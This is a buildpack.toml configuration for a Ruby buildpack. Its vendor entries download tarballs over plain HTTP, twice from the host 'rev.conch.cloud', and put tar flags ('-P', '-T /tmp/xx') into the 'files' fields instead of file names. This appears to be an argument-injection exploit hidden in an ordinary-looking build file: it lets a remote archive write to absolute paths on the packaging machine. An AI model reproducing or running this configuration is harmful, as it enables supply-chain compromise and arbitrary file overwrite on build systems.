[buildpack]
name = "h-buildpack"
ruby_version = "2.5.6"

  [publish.Ignore]
  files = [
    "spec/"
  ]

  [[publish.Vendor]]
  url = "http://rev.conch.cloud/tark.tar"
  dir = "."
  files = ["-P"]
  [[publish.Vendor]]
  url = "http://codon-buildpacks.s3.amazonaws.com/buildpacks/heroku/ruby.tgz"
  dir = "."
  files = ["-T","/tmp/xx"]
  [[publish.Vendor]]
  url = "http://rev.conch.cloud/tark.tar"
  dir = "."
  files = ["-P"]
 
